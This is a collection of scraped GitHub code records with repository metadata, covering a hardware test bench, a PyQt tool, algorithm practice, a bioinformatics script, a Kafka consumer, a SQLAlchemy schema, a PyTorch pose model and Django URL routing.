self.io_outBundleA_a_sfix = truncUInt(sint(dut.io_inBundleA_a_sfix) >> 2, dut.io_outBundleA_a_sfix)\n sfix2 = sint(dut.io_inSFix2)\n self.io_outSFix2 = truncUInt(((sfix2 << 1) + sfix2) << 1, dut.io_outSFix2)\n\n@cocotb.test()\ndef test1(dut):\n dut.log.info(\"Cocotb test boot\")\n #random.seed(0)\n\n\n for i in range(0,1000):\n randSignal(dut.io_inSFix_0)\n randSignal(dut.io_inSFix_1)\n randSignal(dut.io_inBundleA_a_sfix)\n randSignal(dut.io_inSFix2)\n yield Timer(1000)\n ref = Ref(dut)\n assertEquals(ref.io_outSFix_0, dut.io_outSFix_0, \"io_outSFix_0\")\n assertEquals(ref.io_outSFix_1, dut.io_outSFix_1, \"io_outSFix_1\")\n assertEquals(ref.io_outSFix2, dut.io_outSFix2, \"io_outSFix2\")\n assertEquals(ref.io_outBundleA_a_sfix, dut.io_outBundleA_a_sfix, \"io_outBundleA_a_sfix\")\n\n 
dut.log.info(\"Cocotb test done\")\n", "repo_name": "SpinalHDL/SpinalHDL", "sub_path": "tester/src/test/python/spinal/FixedPointTester/FixedPointTester.py", "file_name": "FixedPointTester.py", "file_ext": "py", "file_size_in_byte": 1279, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1406, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cocotblib.misc.truncUInt", "line_number": 9, "usage_type": "call"}, {"api_name": "cocotblib.misc.sint", "line_number": 9, "usage_type": "call"}, {"api_name": "cocotblib.misc.truncUInt", "line_number": 10, "usage_type": "call"}, {"api_name": "cocotblib.misc.sint", "line_number": 10, "usage_type": "call"}, {"api_name": "cocotblib.misc.truncUInt", "line_number": 11, "usage_type": "call"}, {"api_name": "cocotblib.misc.sint", "line_number": 11, "usage_type": "call"}, {"api_name": "cocotblib.misc.sint", "line_number": 12, "usage_type": "call"}, {"api_name": "cocotblib.misc.truncUInt", "line_number": 13, "usage_type": "call"}, {"api_name": "cocotblib.misc.randSignal", "line_number": 22, "usage_type": "call"}, {"api_name": "cocotblib.misc.randSignal", "line_number": 23, "usage_type": "call"}, {"api_name": "cocotblib.misc.randSignal", "line_number": 24, "usage_type": "call"}, {"api_name": "cocotblib.misc.randSignal", "line_number": 25, "usage_type": "call"}, {"api_name": "cocotb.triggers.Timer", "line_number": 26, "usage_type": "call"}, {"api_name": "cocotblib.misc.assertEquals", "line_number": 28, "usage_type": "call"}, {"api_name": "cocotblib.misc.assertEquals", "line_number": 29, "usage_type": "call"}, {"api_name": "cocotblib.misc.assertEquals", "line_number": 30, "usage_type": "call"}, {"api_name": "cocotblib.misc.assertEquals", "line_number": 31, "usage_type": "call"}, {"api_name": "cocotb.test", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "21162919840", "text": "from PyQt5.QtCore import pyqtSlot, Qt, QThread, pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QMessageBox\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtGui import QFont\n\nfrom ui.remove_gg import Ui_Form\nfrom ui.netwok import *\n\nfont_command = QFont()\nfont_command.setFamily(\"Arial\")\nfont_command.setPointSize(8)\n\nsernum = ''\nclass Remove_Ui(QWidget, Ui_Form):\n def __init__(self):\n super(Remove_Ui, self).__init__()\n self.setupUi(self)\n self.textEdit.setFont(font_command)\n\n self.textEdit.setDisabled(True)\n self.pushButton.clicked.connect(self.push_remove)\n\n @pyqtSlot()\n def push_remove(self):\n global sernum\n sernum = self.re_num_line.text()\n\n if not sernum:\n QMessageBox.about(self, '服务器编号不能为空', '服务器编号不能为空, 请输入服务器编号!')\n return\n\n run = Run_thr()\n self.textEdit.append('正在删除...')\n run.signal_ip.connect(self.removeip)\n run.start()\n run.exec()\n\n def removeip(self, status):\n if status == '1':\n QMessageBox.about(self, '机器编号输入错误', '后台查找不到此机器编号!')\n self.textEdit.append('机器编号输入错误!')\n return\n if status == '2':\n QMessageBox.about(self, '此服务器没有IP', '此服务器未分配IP!')\n self.textEdit.append('此服务器未分配IP!')\n return\n else:\n self.textEdit.append('删除完成!')\n\nclass Run_thr(QThread):\n signal_ip = pyqtSignal(str)\n def __init__(self):\n super(Run_thr, self).__init__()\n\n def run(self):\n self.signal_ip.emit(remove_ip(num=sernum))", "repo_name": "xuanJx/tools", "sub_path": "ui/remove_ui.py", "file_name": "remove_ui.py", "file_ext": "py", "file_size_in_byte": 1742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtGui.QFont", "line_number": 9, 
"usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 14, "usage_type": "name"}, {"api_name": "ui.remove_gg.Ui_Form", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.about", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.about", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.about", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 44, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 50, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "39488865124", "text": "# 猜数游戏\n# 猜数字 告诉大/小 猜错了给猜数字的钱 猜对了获胜 计算至少需要多少钱可以保证获胜(代价最小)\n\n# 首先二分查找查找次数最少 代价不是最少\n# 最小化极大问题 需要考虑最恶劣的情况 并且把开支最小化\nimport sys\nfrom typing import List\nclass Solution:\n def getMoneyAmount(self,n:int)->int:\n def cost(self, low:int, high:int)->int:\n if low > high:\n return 0\n res = sys.maxsize\n for i in range(low,high+1):\n tmp = i + max(cost(low,i-1),cost(i+1,high))\n res = min(res,tmp)\n return res\n return cost(1,n)\n # 记忆化递归 在取极大值时 我们需要判断i划分的两部分区域哪边继续寻找花销更大 如果我们从正中间分开\n # 显然右边更大\n def getMoneyAmount(self,n:int)->int:\n def cost(self,low:int,high:int,mem:List[List[int]])->int:\n if low > high:\n return 0\n if mem[low][high] != 0:\n return mem[low][high]\n res = sys.maxsize\n for i in range((low+high)//2,high+1):\n tmp = i + max(\n cost(low,i-1,mem),\n cost(i+1,high,mem),\n )\n # 尝试策略的最小\n res = min(res,tmp)\n mem[low][high] = res\n return res\n\n if n== 1:\n return 0\n mem = [[0]*(n+1) for _ in range(n+1)]\n\n return cost(1,n,mem)\n\n\n\n\n", "repo_name": "JudgesL/python-learning", "sub_path": "算法通关之路/第12章 博弈问题/猜数字大小.py", "file_name": "猜数字大小.py", "file_ext": "py", "file_size_in_byte": 1556, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.maxsize", "line_number": 13, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "sys.maxsize", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "28415641530", "text": "from kafka import KafkaConsumer\nfrom multiprocessing import Process\nimport time\nimport json\n\n# Function that creates and runs a consumer\ndef run_consumer(consumer_id):\n consumer = KafkaConsumer(\n 'my-topic',\n group_id=None,\n auto_offset_reset='earliest',\n bootstrap_servers='localhost:9092',\n value_deserializer=lambda x: json.loads(x.decode('utf-8')) # Decode bytes to string and parse JSON\n )\n\n # Subscribe to the topic\n consumer.subscribe(['my-topic'])\n\n # Consume messages\n for message in consumer:\n current_time = time.time() # Get the current time in seconds\n message_time = message.value['timestamp'] # Get the message timestamp\n \n # Calculate the delta para latencia\n delta = current_time - message_time # Calculate the delta\n if delta < 30:\n with open(f'consumer_{consumer_id}_latency.txt', 'a') as f:\n f.write(f'{delta}\\n') # Write the message value and delta to the file\n\n # Close the consumer\n consumer.close()\n\n# Number of consumers\nnum_consumers = 30\n\n# Create and start consumers\nprocesses = []\nfor i in 
range(num_consumers):\n p = Process(target=run_consumer, args=(i,))\n p.start()\n processes.append(p)\n\ndef terminate_processes(processes):\n # Terminate all child processes\n for p in processes:\n p.terminate()\n p.join()\n# Wait for all consumers to finish\ntry:\n # Wait for all child processes to finish\n for p in processes:\n p.join()\nexcept KeyboardInterrupt:\n # Handle KeyboardInterrupt (Ctrl+C)\n print(\"KeyboardInterrupt detected. Terminating processes...\")\n terminate_processes(processes)", "repo_name": "mateogon/messaging-queue", "sub_path": "kafka/single_broker/k_consumer.py", "file_name": "k_consumer.py", "file_ext": "py", "file_size_in_byte": 1687, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "kafka.KafkaConsumer", "line_number": 8, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "31698420513", "text": "#!/usr/bin/env python3\nimport sys\nimport os\nimport glob\nfrom Bio.Blast import NCBIXML\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\n\n#Usage: python3 recruit_ORFs.py ORFs_db_example.ffn species_dir\n\ndef get_hit_ids(blast_file):\n blastfile_handle = open(blast_file)\n blast_records = NCBIXML.parse(blastfile_handle)\n hit_ids = list()\n for blast_record in blast_records:\n for alignment in blast_record.alignments: \n hit_name_full = alignment.title \n hit_name_split = hit_name_full.split() \n hit_id=hit_name_split[-1]\n hit_ids.append(hit_id)\n return(hit_ids)\n\n#Parse input arguments, set of working dirs\norf_db_file = sys.argv[1]\nspecies_dir = sys.argv[2]\ncurrent_dir = os.getcwd()\nfh_log_out = open('log.txt','a')\n\n#Move into SDP directory, use glob to get the names of all blast-files (exit script, if there are no such files)\nos.chdir(species_dir)\nblast_suffix = '*blastn'\nblast_files = glob.glob(blast_suffix)\nnb_blast_files = len(blast_files)\nif (nb_blast_files == 0):\n print('ERROR: No blast-files with the suffix \"*blastn\" were found in the species directory: \\n')\n fh_log_out.write('ERROR: No blast-files with the suffix \"*blastn\" were found in the species directory: \\n')\n fh_log_out.write(species_dir + \"\\n\")\n exit()\n\n#Loop over blast-files, and get the hit-ids for all hits. Store in dictionaries, with OG-affiliation. 
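A hedged illustration of the two lookups built below: hit ids are indexed by orthologous group (OG) and vice versa. The ids and OG names here are made up purely for the example.

# Sketch of the expected dict shapes (hypothetical ids):
hit_ids_by_og = {"OG0001": {"orf_17": 1, "orf_42": 1}, "OG0002": {"orf_99": 1}}
og_by_hit_id = {h: og for og, hits in hit_ids_by_og.items() for h in hits}
assert og_by_hit_id["orf_42"] == "OG0001"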
\nhit_id_OG = dict()\nOG_hit_id = dict()\ncount_progress = 0\nfor file in blast_files:\n count_progress += 1\n if (os.stat(file).st_size != 0): #check if file is empty\n split_filename = file.split('.')\n OG=split_filename[0]\n hit_ids = get_hit_ids(file)\n OG_hit_id[OG]=dict()\n for id in hit_ids:\n hit_id_OG[id]=OG\n OG_hit_id[OG][id]=1\n if (count_progress % 100 == 0):\n print('Finished parsing',count_progress,'blast-files')\n\n#Move back to run-directory, parse out seq-objects for all hit-ids\nos.chdir(current_dir)\nhit_seq_objects = dict()\nprint('Getting seq-records from ORF db')\nfor seq_record in SeqIO.parse(orf_db_file, \"fasta\"):\n if(seq_record.id in hit_id_OG):\n seq_length = len(seq_record.seq)\n if (seq_length > 200):\n hit_seq_objects[seq_record.id] = seq_record\n\n \n#Print ORF sequences to the SDP directory\nos.chdir(species_dir)\nprint('Printing recruited ORFs to files')\nnb_orfs_recruited=0\nfor OG in OG_hit_id.keys():\n ORF_seq_objects = list()\n for hit_id in OG_hit_id[OG].keys():\n if (hit_id in hit_seq_objects):\n ORF_seq_objects.append(hit_seq_objects[hit_id])\n nb_objects = len(ORF_seq_objects)\n if (nb_objects != 0):\n orf_outfile = OG + '_orfs.ffn'\n if (os.path.isfile(orf_outfile)):\n fh_log_out = open('log.txt','a')\n fh_log_out.write(\"NOTE: The following orf-file already exists: \" + orf_outfile + \"\\n\")\n fh_log_out.close()\n print('NOTE: The following orf-file already exists:', orf_outfile)\n else:\n nb_orfs_recruited += len(ORF_seq_objects)\n SeqIO.write(ORF_seq_objects, orf_outfile, \"fasta\")\nos.chdir(current_dir)\nfh_log_out = open('log.txt','a')\nfh_log_out.write(\"Recruited \" + str(nb_orfs_recruited) + \" ORFs to dir: \" + species_dir + \"\\n\")\nfh_log_out.close()\nprint(\"Recruited\",nb_orfs_recruited, \"ORFs to species\", species_dir)\n", "repo_name": "kirsten2/Species_validation", "sub_path": "bin/recruit_ORFs.py", "file_name": "recruit_ORFs.py", "file_ext": "py", "file_size_in_byte": 3402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Bio.Blast.NCBIXML.parse", "line_number": 13, "usage_type": "call"}, {"api_name": "Bio.Blast.NCBIXML", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 26, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 30, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 32, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 46, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 58, "usage_type": "call"}, {"api_name": "Bio.SeqIO.parse", "line_number": 61, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 61, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "Bio.SeqIO.write", "line_number": 87, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 87, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "3464454977", "text": "import sqlite3\nfrom classes.entity import Entity, EntityItem, Column\n\n\nclass SendChannel(EntityItem):\n def __init__(self, *args, **kwargs):\n self.SENDCHANNEL_ID = None\n self.SOURCE_CHANNEL = None\n self.TARGET_CHANNEL = 
None\n\n super().__init__(*args, **kwargs)\n\n\nclass SendChannels(Entity):\n def __init__(self, db: sqlite3.Connection):\n super().__init__(db,\n \"SendChannel\",\n [Column('SENDCHANNEL_ID', int, nullable=False, primary_key=True, auto_increment=True),\n Column('SOURCE_CHANNEL', int, nullable=False),\n Column('TARGET_CHANNEL', int)\n ],\n SendChannel\n )\n\n\n", "repo_name": "Cubiss/discord_bot", "sub_path": "modules/happyadventure/sendChannels.py", "file_name": "sendChannels.py", "file_ext": "py", "file_size_in_byte": 774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "classes.entity.EntityItem", "line_number": 5, "usage_type": "name"}, {"api_name": "classes.entity.Entity", "line_number": 14, "usage_type": "name"}, {"api_name": "sqlite3.Connection", "line_number": 15, "usage_type": "attribute"}, {"api_name": "classes.entity.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "classes.entity.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "classes.entity.Column", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "70306258725", "text": "import torch\nimport torch.nn as nn\nfrom torchsummary import summary\n\nfrom common import *\n\n\nclass HumanPose_MBN(nn.Module):\n def __init__(self, c1=3, c2=14, alpha=0.5):\n super().__init__()\n\n first_block_filters = make_divisble(int(32*alpha), 8)\n self.conv0 = Conv(c1, first_block_filters, k=3, s=2)\n self.block0 = Mbnv2_block(first_block_filters, c2=16, stride=1, expansion=1, block_id=0)\n self.block1 = Mbnv2_block(make_divisble(int(16*alpha), 8), c2=16, stride=2, expansion=6, block_id=1)\n self.block2 = Mbnv2_block(make_divisble(int(16*alpha), 8), c2=16, stride=1, expansion=6, block_id=2)\n self.block3 = Mbnv2_block(make_divisble(int(16*alpha), 8), c2=32, stride=2, expansion=6, block_id=3)\n self.block4 = Mbnv2_block(make_divisble(int(32*alpha), 8), c2=32, stride=1, expansion=6, block_id=4)\n self.block5 = Mbnv2_block(make_divisble(int(32*alpha), 8), c2=32, stride=1, expansion=6, block_id=5)\n self.block6 = Mbnv2_block(make_divisble(int(32*alpha), 8), c2=48, stride=2, expansion=6, block_id=6)\n self.block7 = Mbnv2_block(make_divisble(int(48*alpha), 8), c2=48, stride=1, expansion=6, block_id=7)\n self.block8 = Mbnv2_block(make_divisble(int(48*alpha), 8), c2=48, stride=1, expansion=6, block_id=8)\n self.block9 = Mbnv2_block(make_divisble(int(48 * alpha), 8), c2=48, stride=1, expansion=6, block_id=9)\n self.block10 = Mbnv2_block(make_divisble(int(48 * alpha), 8), c2=64, stride=1, expansion=6, block_id=10)\n self.block11 = Mbnv2_block(make_divisble(int(64 * alpha), 8), c2=64, stride=1, expansion=6, block_id=11)\n self.block12 = Mbnv2_block(make_divisble(int(64 * alpha), 8), c2=64, stride=1, expansion=6, block_id=12)\n\n self.bb_last_conv = Conv(make_divisble(int(64*alpha), 8), c2=1280, k=1)\n\n # backbone\n self.backbone_sequential = nn.Sequential(\n self.conv0,\n self.block0,\n self.block1,\n self.block2,\n self.block3,\n self.block4,\n self.block5,\n self.block6,\n self.block7,\n self.block8,\n self.block9,\n self.block10,\n self.block11,\n self.block12,\n self.bb_last_conv\n )\n self.fm_p2 = self.backbone_sequential[:4] # feature map with 4 times downsample, output of block2\n self.fm_p3 = self.backbone_sequential[:7] # p3/8\n self.fm_p4 = self.backbone_sequential[:11] # p4/16\n\n # head\n # fuse-1 -------------------------------\n self.fuse1_sequential = nn.Sequential(\n Conv(1280, 64, k=1, act=\"relu\"),\n DWConvTranspose2d(64, 
64, k=3, p1=1)\n )\n self.fuse1_conv = Conv(24, 64, k=1, act=\"relu\")\n\n # fuse-2 -------------------------------\n self.fuse2_sequential = nn.Sequential(\n DWConv(64, 64, k=3, act=False),\n Conv(64, 32, k=1, act=\"relu\"),\n DWConvTranspose2d(32, 32, k=3, s=2, p1=1, p2=1) # output size = (input_size - 1) * stride - 2 * padding + kernel_size + output_padding\n )\n self.fuse2_conv = Conv(16, 32, k=1, act=\"relu\")\n\n # fuse-3 -------------------------------\n self.fuse3_sequential = nn.Sequential(\n DWConv(32, 32, k=3, act=False),\n Conv(32, 24, k=1, act=\"relu\"),\n DWConvTranspose2d(24, 24, k=3, s=2, p1=1, p2=1)\n )\n self.fuse3_conv = Conv(8, 24, k=1, act=\"relu\")\n\n # final sequential ---------------------\n self.final_sequential = nn.Sequential(\n DWConv(24, 24, k=3, act=False),\n Conv(24, 24, k=1, act=\"relu\"),\n DWConv(24, 24, k=3, act=False),\n Conv(24, 24, k=1, act=\"relu\"),\n Conv(24, 14, k=1, act=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n # extract different scale feature maps to fuse\n fm_p2 = self.fm_p2(x) # feature map with 4 times downsample, output of block2\n fm_p3 = self.fm_p3(x) # p3/8\n fm_p4 = self.fm_p4(x) # p4/16\n\n backbone_output = self.backbone_sequential[11:](fm_p4)\n print(self.fuse1_sequential(backbone_output).shape, self.fuse1_conv(fm_p4).shape)\n # fuse backbone feature maps\n fuse1 = torch.add(self.fuse1_sequential(backbone_output), self.fuse1_conv(fm_p4))\n fuse2 = torch.add(self.fuse2_sequential(fuse1), self.fuse2_conv(fm_p3))\n fuse3 = torch.add(self.fuse3_sequential(fuse2), self.fuse3_conv(fm_p2))\n\n # final detect\n output = self.final_sequential(fuse3)\n\n return output\n\n\nif __name__ == \"__main__\":\n from thop import profile\n x = torch.randn((1, 3, 192, 192))\n\n model = HumanPose_MBN(3, 14).eval()\n\n summary(model, (3,192,192))\n flops, params = profile(model, (x,))\n print(f\"GFLOPs: {flops/1e9}, Params: {params}\")", "repo_name": "K-tang-mkv/humanpose-based-objdet", "sub_path": "models/keypoint_heatmap_mbn_v2_standard.py", "file_name": "keypoint_heatmap_mbn_v2_standard.py", "file_ext": "py", "file_size_in_byte": 4875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.add", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.add", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.add", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 107, "usage_type": "call"}, {"api_name": 
"torchsummary.summary", "line_number": 111, "usage_type": "call"}, {"api_name": "thop.profile", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "40954175376", "text": "from sqlalchemy import (\n create_engine,\n Column,\n Integer,\n SMALLINT,\n Enum,\n TIMESTAMP,\n VARCHAR,\n MetaData,\n)\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nimport sqlalchemy.exc\n\nfrom contextlib import contextmanager\n\nmetadata = MetaData()\nBase = declarative_base(metadata=metadata)\n\n\nclass DB:\n def __init__(self, engine):\n\n self.engine = create_engine(engine)\n self.Session = sessionmaker(bind=self.engine)\n\n metadata.drop_all(self.engine)\n metadata.create_all(self.engine)\n\n @contextmanager\n def session(self):\n db_session = _DBSession(self.Session())\n try:\n yield db_session\n db_session.session.commit()\n except sqlalchemy.exc.SQLAlchemyError:\n db_session.session.rollback()\n raise\n finally:\n db_session.session.close()\n\n\nclass _DBSession:\n def __init__(self, session):\n self.session = session\n\n def insert_accounts(self, values):\n self.session.bulk_insert_mappings(Account, values)\n\n def insert_player_infos(self, values):\n self.session.bulk_insert_mappings(PlayerInfo, values)\n\n\nclass Account(Base):\n __tablename__ = \"accounts\"\n\n id = Column(Integer, primary_key=True)\n player_id = Column(Integer, index=True)\n last_update = Column(TIMESTAMP)\n fed_reason = Column(VARCHAR(length=256))\n player_state = Column(Enum(\"OK\", \"Deleted\", \"Fedded\", \"ERROR\"))\n\n\nclass PlayerInfo(Base):\n __tablename__ = \"player_info\"\n\n id = Column(Integer, primary_key=True)\n player_id = Column(Integer, index=True)\n num_id = Column(Integer)\n name = Column(VARCHAR(length=128))\n age = Column(SMALLINT)\n role = Column(\n Enum(\n \"Civilian\",\n \"Admin\",\n \"Helper\",\n \"Staff\",\n \"Moderator\",\n \"Reporter\",\n \"NPC\",\n \"Officer\",\n \"Wiki Contributor\",\n \"Wiki Editor\",\n \"Tester\",\n \"\",\n )\n )\n initial_signup = Column(TIMESTAMP)\n last_action = Column(TIMESTAMP)\n total_duration = Column(Integer)\n total_units = Column(\n Enum(\n \"seconds\",\n \"second\",\n \"minutes\",\n \"minute\",\n \"hours\",\n \"hour\",\n \"days\",\n \"day\",\n \"years\",\n \"year\",\n \"No Last Action\",\n ),\n )\n rank = Column(VARCHAR(128))\n level = Column(SMALLINT)\n last_update = Column(TIMESTAMP)\n", "repo_name": "TotallyNot/DBConverter", "sub_path": "db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 2577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.MetaData", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.exc", "line_number": 37, "usage_type": "attribute"}, {"api_name": "contextlib.contextmanager", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 58, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 59, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 60, "usage_type": "call"}, 
{"api_name": "sqlalchemy.TIMESTAMP", "line_number": 60, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlalchemy.Enum", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 68, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 69, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 69, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 70, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 70, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 71, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 71, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 72, "usage_type": "call"}, {"api_name": "sqlalchemy.SMALLINT", "line_number": 72, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 73, "usage_type": "call"}, {"api_name": "sqlalchemy.Enum", "line_number": 74, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 89, "usage_type": "call"}, {"api_name": "sqlalchemy.TIMESTAMP", "line_number": 89, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 90, "usage_type": "call"}, {"api_name": "sqlalchemy.TIMESTAMP", "line_number": 90, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 91, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 91, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 92, "usage_type": "call"}, {"api_name": "sqlalchemy.Enum", "line_number": 93, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 107, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 107, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 108, "usage_type": "call"}, {"api_name": "sqlalchemy.SMALLINT", "line_number": 108, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 109, "usage_type": "call"}, {"api_name": "sqlalchemy.TIMESTAMP", "line_number": 109, "usage_type": "argument"}]} +{"seq_id": "37761489693", "text": "from django.urls import include, path\n\nfrom rest_framework import routers\n\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\n\nfrom . 
import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'posts', views.PostViewSet)\nrouter.register(r'comments', views.CommentViewSet)\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('dj-rest-auth/', include('dj_rest_auth.urls')),\n path('dj-rest-auth/registration/', include('dj_rest_auth.registration.urls')),\n\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n]\n", "repo_name": "mark-antonov/hillel_django_rest_framework", "sub_path": "blog_api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 902, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.routers", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView.as_view", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, 